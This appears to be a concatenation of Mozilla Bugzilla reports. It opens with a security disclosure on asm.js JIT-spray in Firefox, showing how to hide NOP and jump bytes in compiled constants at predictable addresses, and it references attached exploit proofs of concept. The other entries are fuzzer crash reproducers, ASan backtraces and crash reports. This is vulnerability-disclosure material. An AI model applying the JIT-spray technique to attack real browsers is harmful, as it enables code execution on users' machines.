And in line 229 the RW region is made executable (PAGE_EXECUTE_READ) with
ExecutableAllocator::makeExecutable which calls VirtualProtect.
An attacker can request one asm.js module many times, which leads to the
creation of many RX regions. Due to the allocation granularity of VirtualAlloc
he can then choose a fixed address (such as 0x1c1c0000) and can be certain that
his compiled/native asm.js code is located there.
IMO following flaws/missing checks are responsible that asm.js JIT-spray is
possible. Some of them are well known:
1) Not MANY, but only ONE RX region should be created per module. Many requests
to one asm.js module should return references instead of new RX regions.
2.1) Constant folding is missing in Release (50.1.0). (But it seems it was
added in Nightly between 18 Nov. 2016 and 30 Nov. 2016). This makes it possible
to use many subsequent arithmetic operations on one variable and wrap the
legitimate instructions.
For example, we can hide three NOPS (0x90) in asm.js constants with:
VAL = (VAL + 0xA8909090)|0;
VAL = (VAL + 0xA8909090)|0;
Following native code is generated:
00: 05909090A8 ADD EAX, 0xA8909090
05: 05909090A8 ADD EAX, 0xA8909090
When we jump into offset 01 (the immediate of the first instruction) we can
execute our hidden code (We'll use 0xA8 as masking byte):
01: 90 NOP
02: 90 NOP
03: 90 NOP
04: A805 TEST AL, 05
06: 90 NOP
07: 90 NOP
08: 90 NOP
09: A8...
2.2) Although constant folding/propagation seems to be implemented in Nightly,
an attacker can still force to emit his hidden code: for example, he can hide
two nops and a jump to the next constant with following asm.js code:
asm_js_heap[0x10] = 0xEB069090;
asm_js_heap[0x11] = 0xEB069090;
asm.js emits following native code:
00: B89090EB06 MOV EAX, 0x06EB9090
05: A340C07B04 MOV DWORD [0x047BC040], EAX
0A: B89090EB06 MOV EAX, 0x06EB9090
0F: A344C07B04 MOV DWORD [0x047BC044], EAX
But when we jump into offset 01, we get:
01: 90 NOP
02: 90 NOP
03: EB06 JMP 0x0B
..
0B: 90 NOP
0C: 90 NOP
0D: EB06 JMP 0x15
..
2.3) Another possibility is to use FFI and pass many parameters to it.
Consider following asm.js code:
heap[10] = ffi(0x90909090|0, 0x90909090|0, 0x90909090|0, 0x90909090|0, /* and many more*/ )
Following native code is emitted (Nightly 53.0a1 20161215061212 32-bit - Windows 10):
0:026> u 1c1c0053
1c1c0053 90 nop
1c1c0054 90 nop
1c1c0055 90 nop
1c1c0056 c744240c90909090 mov dword ptr [esp+0Ch],90909090h
1c1c005e c744241090909090 mov dword ptr [esp+10h],90909090h
1c1c0066 c744241490909090 mov dword ptr [esp+14h],90909090h
1c1c006e c744241890909090 mov dword ptr [esp+18h],90909090h
1c1c0076 c744241c90909090 mov dword ptr [esp+1Ch],90909090h
This again allows to use two bytes as payload bytes and two bytes as jump to
the next constant.
3) There is no constant blinding of 4-byte constants. Hence, an attacker can
use the well known trick to hide his opcodes/payload/shellcode within the
constants (as shown in 2.1, 2.2, 2.3).
4) There is insufficient random nop insertion. It seems that the same amount
and type of nops are emitted for a specific module. That means, that the native
code of one module is fully predictable. An attacker can test his code and use
it across other machines with the same OS/Firefox version (am I missing here
sth.?). Better random nop insertion would break 2.1, 2.2, 2.3. More random
base addresses, each time the same module is used would help, too. Separating
code from data such as using a constant pool for constants might also help.
To demonstrate that this asm.js JIT-spray works, I attached several proof of
concepts for Windows 8.1 and Windows 10 (including an exploit for
CVE-2016-9079, the recent Tor Browser 0day). I have also exploits for
CVE-2016-1960 and CVE-2016-2819, but the attached PoCs should proof the point.
Information how to test them is available in the PoCs.
Principally, asm.js JIT-spray should work for Linux, too. However, mmap returns
regions on a 4 KB granularity, hence more modules need to be sprayed to occupy
a predictable address. I did not investigate any possibilities for 64-bit
Firefox. However it might also be affected in one or another way.
I think JIT hardening was also tracked by
https://bugzilla.mozilla.org/show_bug.cgi?id=677272.
Please correct me if anything is wrong or if I missed something. Or ping me if
one of the PoCs does not work or if you need more information.
More general information about JIT-spray can be found here:
https://packetstormsecurity.com/files/86975/Writing-JIT-Spray-Shellcode.pdf
http://zhodiac.hispahack.com/my-stuff/security/Flash_Jit_InfoLeak_Gadgets.pdf
https://www.nccgroup.trust/globalassets/resources/us/presentations/documents/attacking_clientside_jit_compilers.pdf
https://www.nccgroup.trust/globalassets/resources/us/presentations/documents/attacking_clientside_jit_compilers_paper.pdf
https://media.blackhat.com/bh-us-11/Tsai/BH_US_11_TsaiPan_Weapons_Targeted_Attack_Slides.pdf
https://erpscan.com/wp-content/uploads/2012/06/HITB-JIT-Spray-Attacks-and-Advanced-Shellcode.pdf
http://xlab.tencent.com/en/2015/12/09/bypass-dep-and-cfg-using-jit-compiler-in-chakra-engine/
https://sites.google.com/site/bingsunsec/WARPJIT/JIT%20Spraying%20Never%20Dies%20-%20Bypass%20CFG%20By%20Leveraging%20WARP%20Shader%20JIT%20Spraying.pdf
Best,
Rh0
|
|
1,325,253 | 11,936,567 |
This bug was filed from the Socorro interface and is
report bp-c23b0fb0-bdb7-4dea-ac0b-f3d262161221.
=============================================================
There has been a large number of this crash starting with the 12-20 Aurora build (the previous bug, bug 1315521, was closed a month ago). Alastor, do you think this is a regression from bug 1320005, which was uplifted to Aurora in the 12-20 build?
|
|
1,325,344 | 11,937,367 |
The following testcase crashes on mozilla-central revision 7083c0d30e75 (build with --enable-debug --enable-more-deterministic, run with --fuzzing-safe --no-threads --ion-eager --ion-gvn=off):
function f(x, y) {
y(1 != x || 1 == -x);
}
for (var i = 0; i < 2; i++) {
try {
f();
} catch (e) {}
}
Backtrace:
0 js-dbg-64-dm-clang-darwin-7083c0d30e75 0x0000000101865863 js::jit::LIRGenerator::visitToInt32(js::jit::MToInt32*) + 1619 (Lowering.cpp:2159)
1 js-dbg-64-dm-clang-darwin-7083c0d30e75 0x0000000101893b48 js::jit::LIRGenerator::visitInstruction(js::jit::MInstruction*) + 56 (Lowering.cpp:4764)
2 js-dbg-64-dm-clang-darwin-7083c0d30e75 0x000000010189430f js::jit::LIRGenerator::visitBlock(js::jit::MBasicBlock*) + 463 (Lowering.cpp:4842)
3 js-dbg-64-dm-clang-darwin-7083c0d30e75 0x0000000101894c2b js::jit::LIRGenerator::generate() + 155 (Lowering.cpp:4907)
4 js-dbg-64-dm-clang-darwin-7083c0d30e75 0x0000000101795a71 js::jit::GenerateLIR(js::jit::MIRGenerator*) + 529 (Ion.cpp:1931)
/snip
For detailed crash information, see attachment.
Setting s-s as a start because LIR is involved.
|
|
1,325,450 | 11,938,592 |
The attached binary WebAssembly testcase crashes on mozilla-inbound revision 5a74fd7f6ddd+ (build with --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --enable-address-sanitizer --disable-jemalloc --enable-optimize=-O2 --without-intl-api --enable-debug --target=i686-pc-linux-gnu). To reproduce, you can run the following code in the JS shell (running with --wasm-always-baseline might be necessary):
var data = os.file.readFile(file, 'binary');
new WebAssembly.Instance(new WebAssembly.Module(data.buffer));
Backtrace:
==3985==ERROR: AddressSanitizer: SEGV on unknown address 0x00000000 (pc 0x0cb99a70 bp 0xffdd5378 sp 0xffdd5200 T0)
#0 0xcb99a6f in js::jit::BacktrackingAllocator::processBundle(js::jit::MIRGenerator*, js::jit::LiveBundle*) js/src/jit/BacktrackingAllocator.cpp:1320:9
#1 0xcb91653 in js::jit::BacktrackingAllocator::go() js/src/jit/BacktrackingAllocator.cpp:837:14
#2 0x973bb85 in js::jit::GenerateLIR(js::jit::MIRGenerator*) js/src/jit/Ion.cpp:1956:18
#3 0x8b189db in js::wasm::IonCompileFunction(js::wasm::CompileTask*) js/src/wasm/WasmIonCompile.cpp:3769:25
#4 0x8a4f59c in js::wasm::CompileFunction(js::wasm::CompileTask*) js/src/wasm/WasmGenerator.cpp:1148:16
#5 0x8a4ec52 in js::wasm::ModuleGenerator::finishFuncDef(unsigned int, js::wasm::FunctionGenerator*) js/src/wasm/WasmGenerator.cpp:928:14
#6 0x89f9fba in DecodeFunctionBody(js::wasm::Decoder&, js::wasm::ModuleGenerator&, unsigned int) js/src/wasm/WasmCompile.cpp:60:12
#7 0x89f9fba in DecodeCodeSection(js::wasm::Decoder&, js::wasm::ModuleGenerator&) js/src/wasm/WasmCompile.cpp:88
#8 0x89f9fba in js::wasm::Compile(js::wasm::ShareableBytes const&, js::wasm::CompileArgs const&, mozilla::UniquePtr<char [], JS::FreePolicy>*) js/src/wasm/WasmCompile.cpp:124
#9 0x8bf8a87 in js::wasm::Eval(JSContext*, JS::Handle<js::TypedArrayObject*>, JS::Handle<JSObject*>, JS::MutableHandle<js::WasmInstanceObject*>) js/src/wasm/WasmJS.cpp:390:27
#10 0x828b14a in WasmLoop(JSContext*, unsigned int, JS::Value*) js/src/shell/js.cpp:5638:14
#11 0xbc0ecd3 in js::CallJSNative(JSContext*, bool (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&) js/src/jscntxtinlines.h:239:15
[...]
#25 0x80b130a in _start (/home/ubuntu/build/build/js+0x80b130a)
Marking s-s because this is a backtracking allocator assertion and these can possibly be s-s.
|
|
1,315,837 | 11,843,275 |
This bug was filed from the Socorro interface and is
report bp-e76cc856-efe5-4ac5-a9e0-367da2161106.
=============================================================
Bug 1314032 fixed some of the crashes with this signature, but this is still a top crash on Nightly.
(In reply to Tobias Schneider [:tobytailor] from comment #16)
> Andrew, please file a new one, since these crashes seem to happen in
> mozilla::dom::Element::UpdateIntersectionObservation which I'm pretty sure
> is unrelated to this bug.
|
|
1,315,856 | 11,843,499 |
The following testcase crashes on mozilla-central revision 908557c762f7 (build with --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --enable-debug --enable-optimize, run with --fuzzing-safe --thread-count=2 --disable-oom-functions --disable-oom-functions --baseline-eager --ion-eager --ion-check-range-analysis):
See attachment.
Backtrace:
received signal SIGSEGV, Segmentation fault.
0x00000000004645e8 in JS::Value::toObjectOrNull (this=<optimized out>) at /srv/jenkins/jobs/mozilla-central-build-jsshell/workspace/arch/64/compiler/gcc/sanitizer/none/type/debug/dist/include/js/Value.h:671
#0 0x00000000004645e8 in JS::Value::toObjectOrNull (this=<optimized out>) at /srv/jenkins/jobs/mozilla-central-build-jsshell/workspace/arch/64/compiler/gcc/sanitizer/none/type/debug/dist/include/js/Value.h:671
#1 JS::Value::toObject (this=<optimized out>) at /srv/jenkins/jobs/mozilla-central-build-jsshell/workspace/arch/64/compiler/gcc/sanitizer/none/type/debug/dist/include/js/Value.h:661
#2 0x0000000000d33a30 in js::DispatchTyped<DoMarkingFunctor<JS::Value>, js::GCMarker*&> (f=..., val=...) at /srv/jenkins/jobs/mozilla-central-build-jsshell/workspace/arch/64/compiler/gcc/sanitizer/none/type/debug/dist/include/js/Value.h:1483
#3 0x0000000000d33ae6 in DoMarking<JS::Value> (thing=..., gcmarker=0x7ffff6961d58) at js/src/gc/Marking.cpp:812
#4 DispatchToTracer<JS::Value> (trc=<optimized out>, thingp=0x7fffee336848, name=<optimized out>) at js/src/gc/Marking.cpp:661
#5 0x00007ffff7e3beff in ?? ()
#6 0x0000000000000000 in ?? ()
rax 0x0 0
rbx 0x7ffff6961d58 140737330421080
rcx 0x7ffff6c28a2d 140737333332525
rdx 0x0 0
rsi 0x7ffff6ef7770 140737336276848
rdi 0x7ffff6ef6540 140737336272192
rbp 0x7ffffff388b0 140737487538352
rsp 0x7ffffff388b0 140737487538352
r8 0x7ffff6ef7770 140737336276848
r9 0x7ffff7fe4740 140737354024768
r10 0x58 88
r11 0x7ffff6b9f750 140737332770640
r12 0x0 0
r13 0x7fffffff27f0 140737488300016
r14 0x1 1
r15 0x0 0
rip 0x4645e8 <JS::Value::toObject() const+168>
=> 0x4645e8 <JS::Value::toObject() const+168>: movl $0x0,0x0
0x4645f3 <JS::Value::toObject() const+179>: ud2
The attached testcase is unreduced because reducing it turns it highly intermittent. It would be very beneficial for fuzzing to know, why this happens and what we can do about it. Also marking s-s and sec-critical because this is a known-critical assertion often indicating memory corruption of some sort.
|
|
1,317,704 | 11,861,253 |
Created attachment 8810860
testcase.html
The attached testcase causes a null pointer dereference in m-c version f8ba9c9b401f.
==2109==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000030 (pc 0x7fa31f2938a1 bp 0x7ffef3292d90 sp 0x7ffef3292d70 T0)
#0 0x7fa31f2938a0 in GetThread src/obj-firefox/dist/include/nsISupportsImpl.h:58:36
#1 0x7fa31f2938a0 in nsRange::AddRef() src/dom/base/nsRange.cpp:324
#2 0x7fa322b5f18d in AddRef src/obj-firefox/dist/include/mozilla/RefPtr.h:37:5
#3 0x7fa322b5f18d in AddRef src/obj-firefox/dist/include/mozilla/RefPtr.h:396
#4 0x7fa322b5f18d in assign_with_AddRef src/obj-firefox/dist/include/mozilla/RefPtr.h:54
#5 0x7fa322b5f18d in operator= src/obj-firefox/dist/include/mozilla/RefPtr.h:191
#6 0x7fa322b5f18d in init<nsRange *> src/obj-firefox/dist/include/mozilla/OwningNonNull.h:147
#7 0x7fa322b5f18d in OwningNonNull src/obj-firefox/dist/include/mozilla/OwningNonNull.h:25
#8 0x7fa322b5f18d in mozilla::HTMLEditor::RemoveInlinePropertyImpl(nsIAtom*, nsAString_internal const*) src/editor/libeditor/HTMLStyleEditor.cpp:1235
#9 0x7fa322b5e852 in mozilla::HTMLEditor::RemoveAllInlineProperties() src/editor/libeditor/HTMLStyleEditor.cpp:1179:17
#10 0x7fa322beb593 in nsRemoveStylesCommand::DoCommand(char const*, nsISupports*) src/editor/composer/nsComposerCommands.cpp:1166:10
#11 0x7fa32405c0b6 in nsControllerCommandTable::DoCommand(char const*, nsISupports*) src/embedding/components/commandhandler/nsControllerCommandTable.cpp:147:10
#12 0x7fa324052aea in nsBaseCommandController::DoCommand(char const*) src/embedding/components/commandhandler/nsBaseCommandController.cpp:136:10
#13 0x7fa3240593c6 in nsCommandManager::DoCommand(char const*, nsICommandParams*, mozIDOMWindowProxy*) src/embedding/components/commandhandler/nsCommandManager.cpp:214:10
#14 0x7fa321416238 in nsHTMLDocument::ExecCommand(nsAString_internal const&, bool, nsAString_internal const&, mozilla::dom::CallerType, mozilla::ErrorResult&) src/dom/html/nsHTMLDocument.cpp:3228:10
|
|
1,318,039 | 11,864,806 |
This bug was filed from the Socorro interface and is
report bp-821ddbf6-f0c6-45ba-8df8-eeb082161116.
=============================================================
Reproducible: 100%
Steps To Reproduce:
1. Create New profile with Nightly53.0a1 32bit.
2. Start Nightly53.0a1 32bit with the profile
3. Open http://beta.unity3d.com/jonas/AngryBots/ and wait to start the game
4. Quit browser
5. Start Nightly53.0a1 x64 with the same profile of step2
6. Open http://beta.unity3d.com/jonas/AngryBots/
Actual Results:
Tab crashes
Expected Results:
Not crash
|
|
1,322,315 | 11,908,234 |
The following testcase crashes on mozilla-central revision 8103c612b79c (build with --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --enable-debug --enable-optimize, run with --fuzzing-safe --thread-count=2 --baseline-eager --ion-check-range-analysis):
var proxy = Function.prototype.bind.call(new Proxy(Array, {}));
for (var i = 10; i < 349592; ++i) {
var args = Array(i).fill(i);
var array = new proxy(...args);
}
Backtrace:
received signal SIGTRAP, Trace/breakpoint trap.
0x00007ffff7e16198 in ?? ()
#0 0x00007ffff7e16198 in ?? ()
[...]
#24 0x00007ffff7e3be0d in ?? ()
#25 0x0000000000803044 in js::jit::BoxInputsPolicy::adjustInputs (this=0x2026a10 <js::jit::BoxInputsPolicy::Data::thisTypePolicy()::singletonType>, def=0x7ffff3244008, alloc=..., this=0x2026a10 <js::jit::BoxInputsPolicy::Data::thisTypePolicy()::singletonType>) at js/src/jit/TypePolicy.h:85
#26 js::jit::ObjectPolicy<2u>::staticAdjustInputs (alloc=..., ins=0xfff8800000001001) at js/src/jit/TypePolicy.cpp:801
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
rax 0x1001 4097
rbx 0x7fffffff41a8 140737488306600
rcx 0x1001 4097
rdx 0x0 0
rsi 0x7ffff7e14527 140737352123687
rdi 0x7ffff3325d08 140737273552136
rbp 0x7fffffff40f0 140737488306416
rsp 0x7ffffffec0a0 140737488273568
r8 0x0 0
r9 0x52 82
r10 0x7fffffff4118 140737488306456
r11 0x7ffff6b9f750 140737332770640
r12 0x8 8
r13 0x7ffff3244008 140737272627208
r14 0x1001 4097
r15 0x7ffff36ab8d0 140737277245648
rip 0x7ffff7e16198 140737352130968
=> 0x7ffff7e16198: movabs $0xfff9000000000000,%r11
0x7ffff7e161a2: mov %r11,(%rsp)
This looks like a range analysis bug to me, marking s-s until we have investigated if this has any security implications because previous bugs in this area were also s-s.
|
|
1,322,673 | 11,911,561 |
Reproduced with Firefox 52 in failsafe mode with all add-ons disabled. I think this might have been introduced by Bug 667233 but might be wrong.
I could not update my login to the new password on a particular site, let's call it example.com. It turned out that I had the credentials stored twice: once for http://example.com and once for https://example.com. I guess this is something that might occur more and more with many sites moving from http to https.
I could reproduce with the following steps:
1. Duplicate any of your https login creditials of any site. I did so with https://addons.mozilla.org/en-US/firefox/addon/saved-password-editor/ which has a "Clone" menu option.
2. Edit/Change the cloned login entry from https to http.
3. Go to the https version of the site
4. Enter whatever login you might think of (can be wrong)
5. Say "Update" when ask if you want to update this login
AR:
Password is not updated. Have a look in the password manager
ER:
Password should be updated. If you delete the old http entry in the password manager, then it works - I could verify with my original example.com entry.
|
|
1,396,307 | 12,623,239 |
This bug was filed from the Socorro interface and is
report bp-b5956322-c77f-403e-9f74-6cb3a0170831.
=============================================================
Crashing Thread (0)
Frame Module Signature Source
0 ntdll.dll RtlEnterCriticalSection
1 xul.dll mozilla::RecursiveMutexAutoLock::RecursiveMutexAutoLock(mozilla::RecursiveMutex&) obj-firefox/dist/include/mozilla/RecursiveMutex.h:77
2 xul.dll nsInputStreamPump::Suspend() netwerk/base/nsInputStreamPump.cpp:233
3 xul.dll mozilla::net::nsHttpChannel::ContinueProcessResponse2(nsresult) netwerk/protocol/http/nsHttpChannel.cpp:2546
4 xul.dll mozilla::net::nsHttpChannel::ContinueProcessResponse1() netwerk/protocol/http/nsHttpChannel.cpp:2401
5 xul.dll mozilla::net::nsHttpChannel::AsyncContinueProcessResponse() netwerk/protocol/http/nsHttpChannel.cpp:2315
6 xul.dll mozilla::detail::RunnableMethodImpl<mozilla::net::nsHttpChannel*, void ( mozilla::net::nsHttpChannel::*)(void), 1, 0>::Run() obj-firefox/dist/include/nsThreadUtils.h:1172
7 xul.dll nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:1446
8 xul.dll mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:97
9 xul.dll MessageLoop::RunHandler() ipc/chromium/src/base/message_loop.cc:319
10 xul.dll MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:299
11 xul.dll nsBaseAppShell::Run() widget/nsBaseAppShell.cpp:156
12 xul.dll nsAppShell::Run() widget/windows/nsAppShell.cpp:278
13 xul.dll nsAppStartup::Run() toolkit/components/startup/nsAppStartup.cpp:287
14 xul.dll XREMain::XRE_mainRun() toolkit/xre/nsAppRunner.cpp:4608
15 xul.dll XREMain::XRE_main(int, char** const, mozilla::BootstrapConfig const&) toolkit/xre/nsAppRunner.cpp:4772
16 xul.dll XRE_main(int, char** const, mozilla::BootstrapConfig const&) toolkit/xre/nsAppRunner.cpp:4867
17 firefox.exe NS_internal_main(int, char**, char**) browser/app/nsBrowserApp.cpp:309
18 firefox.exe wmain toolkit/xre/nsWindowsWMain.cpp:115
19 firefox.exe __scrt_common_main_seh f:/dd/vctools/crt/vcstartup/src/startup/exe_common.inl:253
20 kernel32.dll BaseThreadInitThunk
21 ntdll.dll RtlUserThreadStart
crash reports with this signature are newly showing up in firefox 56 on 64bit versions of the browser on windows.
the comment to the referenced crash report says "Systematically crashes when logging on to .htaccess password protected websites. Same problem on separate Win 10 PC's. Disabling add-ons resolves issue."
three quarters of the reports have the following extension present: https://addons.mozilla.org/en-US/firefox/addon/passifox/
|
|
1,397,918 | 12,639,136 |
This bug was filed from the Socorro interface and is
report bp-a7417e82-ffcc-4572-940c-eed7f0170524.
=============================================================
I spoke with a user today complaining of crashes. He pointed me at this crash report. In the last week there have been 128 reports on FF55. It also triggers on other branches.
Milan, any thoughts?
|
|
1,398,070 | 12,640,662 |
This bug was filed from the Socorro interface and is
report bp-1765336c-d113-4cb1-b2ef-6fafc0170908.
=============================================================
There are 17 crashes in nightly 57 with buildid 20170907220212.
The pushlog for this nightly:
https://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=d8e238b811d3dc74515065ae8cab6c74baf0295f&tochange=b4c1ad9565ee9d00d96501c4a83083daf25c1413
For information, the ProtocolName field is "PProcessHangMonitorParent".
:billm, could you investigate please ?
|
|
1,399,557 | 12,657,060 |
Spun off bug 1383501
This bug was filed from the Socorro interface and is
report bp-d66274d1-87e3-4728-9de3-a57aa0170913.
=============================================================
We need a way for caller(s) to react smartly when DoInitialUpdate fails. Likely need to be able to return an error code.
Alex this is pretty urgent. Please find AKlotz for high bandwidth details.
|
|
1,402,372 | 12,693,839 |
Created attachment 8911233
D3D9.html
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Steps to reproduce:
I have attached the same PoC (Bug 1398381) which can be used to trigger a heap overflow in ANGLE.
(You can disable hardware acceleration and test.)
I have tested this on: 58 nightly build (should be applicable to the current stable build as well)
libglesv2.dll!memcpy + ? (the exact offset is not known) (id: 72d)
libglesv2.dll!rx::VertexBuffer9::storeVertexAttributes + 0x1D4 (id: 791) [[z:\build\build\src\gfx\angle\src\libangle\renderer\d3d\d3d9\vertexbuffer9.cpp @ 109]]
libglesv2.dll!rx::StreamingVertexBufferInterface::storeDynamicAttribute + 0x204 [[z:\build\build\src\gfx\angle\src\libangle\renderer\d3d\vertexbuffer.cpp @ 173]]
libglesv2.dll!rx::VertexDataManager::storeDynamicAttrib + 0x240 [[z:\build\build\src\gfx\angle\src\libangle\renderer\d3d\vertexdatamanager.cpp @ 480]]
libglesv2.dll!rx::VertexDataManager::storeDynamicAttribs + 0x25A [[z:\build\build\src\gfx\angle\src\libangle\renderer\d3d\vertexdatamanager.cpp @ 400]]
libglesv2.dll!rx::VertexDataManager::prepareVertexData + 0x2DA [[z:\build\build\src\gfx\angle\src\libangle\renderer\d3d\vertexdatamanager.cpp @ 275]]
libglesv2.dll!rx::Renderer9::applyVertexBuffer + 0x5E [[z:\build\build\src\gfx\angle\src\libangle\renderer\d3d\d3d9\renderer9.cpp @ 1285]]
libglesv2.dll!rx::Renderer9::genericDrawElements + 0x1A8 [[z:\build\build\src\gfx\angle\src\libangle\renderer\d3d\d3d9\renderer9.cpp @ 2984]]
libglesv2.dll!rx::Context9::drawElements + 0x47 [[z:\build\build\src\gfx\angle\src\libangle\renderer\d3d\d3d9\context9.cpp @ 157]]
libglesv2.dll!gl::Context::drawElements + 0x33 (inlined function) [[z:\build\build\src\gfx\angle\src\libangle\context.cpp @ 1654]]
libglesv2.dll!gl::DrawElements + 0xB2 [[z:\build\build\src\gfx\angle\src\libglesv2\entry_points_gles_2_0.cpp @ 791]]
xul.dll!mozilla::gl::GLContext::raw_fDrawElements + 0x1A (inlined function) [[z:\build\build\src\gfx\gl\glcontext.h @ 1101]]
xul.dll!mozilla::gl::GLContext::fDrawElements + 0x26 [[z:\build\build\src\gfx\gl\glcontext.h @ 1115]]
xul.dll!mozilla::WebGLContext::DrawElements + 0x13F [[z:\build\build\src\dom\canvas\webglcontextdraw.cpp @ 811]]
xul.dll!mozilla::dom::WebGLRenderingContextBinding::drawElements + 0xB6 [[z:\build\build\src\obj-firefox\dom\bindings\webglrenderingcontextbinding.cpp @ 16256]]
xul.dll!mozilla::dom::GenericBindingMethod + 0x12A [[z:\build\build\src\dom\bindings\bindingutils.cpp @ 3061]]
xul.dll!js::CallJSNative + 0xA3 (inlined function) [[z:\build\build\src\js\src\jscntxtinlines.h @ 293]]
xul.dll!InternalCall + ? (the exact offset is not known) [[z:\build\build\src\js\src\vm\interpreter.cpp @ 495]]
xul.dll!js::CallFromStack + 0xD (inlined function) [[z:\build\build\src\js\src\vm\interpreter.cpp @ 546]]
xul.dll!js::jit::DoCallFallback + 0x24A [[z:\build\build\src\js\src\jit\baselineic.cpp @ 2589]]
0x2E8E572D08E (no function symbol available)
0x18453FC480 (no function symbol available)
0x18453FC1B0 (no function symbol available)
0xFFFE01216EA6D940 (no function symbol available)
0xEEE4421FD838 (no function symbol available)
0x18453FC430 (no function symbol available)
0x18453FC3E8 (no function symbol available)
0x4 (no function symbol available)
0x18453FC3E8 (no function symbol available)
|
|
1,402,469 | 12,694,539 |
Created attachment 8911331
test_case.html
==13026==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000048 (pc 0x7f251ad26085 bp 0x7ffdb30fee90 sp 0x7ffdb30fede0 T0)
#0 0x7f251ad26084 in nsCOMPtr_base /home/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:288:60
#1 0x7f251ad26084 in nsCOMPtr /home/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:460
#2 0x7f251ad26084 in mozilla::HTMLEditor::GetFirstEditableChild(nsINode&) /home/worker/workspace/build/src/editor/libeditor/HTMLEditor.cpp:4203
#3 0x7f251ad0f94e in mozilla::HTMLEditor::RemoveBlockContainer(nsIContent&) /home/worker/workspace/build/src/editor/libeditor/HTMLEditor.cpp:3845:32
#4 0x7f251acd2193 in mozilla::HTMLEditRules::WillMakeList(mozilla::dom::Selection*, nsAString_internal const*, bool, nsAString_internal const*, bool*, bool*, nsAString_internal const*) /home/worker/workspace/build/src/editor/libeditor/HTMLEditRules.cpp:3153:14
#5 0x7f251acc518b in mozilla::HTMLEditRules::WillDoAction(mozilla::dom::Selection*, mozilla::RulesInfo*, bool*, bool*) /home/worker/workspace/build/src/editor/libeditor/HTMLEditRules.cpp:621:14
#6 0x7f251ad58cc5 in mozilla::HTMLEditor::MakeOrChangeList(nsAString_internal const&, bool, nsAString_internal const&) /home/worker/workspace/build/src/editor/libeditor/HTMLEditor.cpp:1988:17
#7 0x7f251ae3092b in nsListCommand::ToggleState(nsIEditor*) /home/worker/workspace/build/src/editor/composer/nsComposerCommands.cpp:305:10
#8 0x7f251ae2cb69 in nsBaseStateUpdatingCommand::DoCommand(char const*, nsISupports*) /home/worker/workspace/build/src/editor/composer/nsComposerCommands.cpp:92:10
#9 0x7f251c2ac146 in nsControllerCommandTable::DoCommand(char const*, nsISupports*) /home/worker/workspace/build/src/embedding/components/commandhandler/nsControllerCommandTable.cpp:147:10
#10 0x7f251c2a2b2a in nsBaseCommandController::DoCommand(char const*) /home/worker/workspace/build/src/embedding/components/commandhandler/nsBaseCommandController.cpp:136:10
#11 0x7f251c2a9486 in nsCommandManager::DoCommand(char const*, nsICommandParams*, mozIDOMWindowProxy*) /home/worker/workspace/build/src/embedding/components/commandhandler/nsCommandManager.cpp:214:10
#12 0x7f2519648fbe in nsHTMLDocument::ExecCommand(nsAString_internal const&, bool, nsAString_internal const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:3234:10
#13 0x7f2518ac9ae4 in mozilla::dom::HTMLDocumentBinding::execCommand(JSContext*, JS::Handle<JSObject*>, nsHTMLDocument*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLDocumentBinding.cpp:829:15
#14 0x7f2518e66399 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2904:13
#15 0x7f251f1ec345 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
#16 0x7f251f1ec345 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
#17 0x7f251f1cc74f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
#18 0x7f251f1cc74f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
#19 0x7f251f1b190d in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
#20 0x7f251f1ec9af in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
#21 0x7f251f1ecff2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
#22 0x7f251ecbde4d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
#23 0x7f251884f96f in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
#24 0x7f251928008a in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
#25 0x7f251928008a in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
#26 0x7f251924a42d in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1134:16
